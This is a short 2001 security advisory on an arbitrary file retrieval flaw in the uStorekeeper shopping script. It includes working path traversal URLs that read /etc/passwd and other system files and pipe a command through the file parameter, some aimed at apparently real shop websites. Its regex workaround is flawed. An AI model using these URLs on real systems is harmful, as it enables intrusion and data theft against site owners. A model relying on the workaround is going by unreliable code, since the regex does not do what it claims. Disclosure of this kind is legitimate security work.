new advisory

2001-04-04T00:00:00
ID SECURITYVULNS:DOC:1461
Type securityvulns
Reporter Securityvulns
Modified 2001-04-04T00:00:00

Description

---=== UkR security team - Advisory ===--- uStorekeeper(tm) Online Shopping System - Runtime Script - 'arbitrary file retreival' vulnerability Date: 03.04.2001 Problem: input validation error. Vulnerable products: ustorekeeper.pl version 1.61 (probably others, but not tested) Product vendor: Microburst Technologies / http://www.uburst.com Comment: '..' and '/' are not filtered while processing user input, so it is possible to enter arbitrary values to retreive files from remote sever, which should not be accessible normally (for ex., /etc/passwd). Workaround:

this will help in somewhat...

$input =~ s/[(\.\.)|\/]//g; Author: XblP /UkR security team (www.ukrteam.ru)/GiN group (www.gin.sh) Greets Exploit: http://www.vulnurable.com/cgi-bin/ustorekeeper.pl?command=goto&file=../../../../../../../../etc/hosts http://www.vulnurable.com/cgi-bin/ustorekeeper.pl?command=goto&file=../../../../../../../../bin/ls Example: http://www.lynchs.com/cgi-bin/ustorekeeper.pl?command=goto&file=../../../../../../../../../../etc/passwd http://www.madamealexanderdollmuseum.com/cgi-bin/ustorekeeper.pl?command=goto&file=../../../../../../../../../../../../../bin/cat%20ustorekeeper.pl| Greets: my love Zemfirius, dev/ice security team, Legion2000 group, Void team, Acidfalz team, IHG team and other ppls.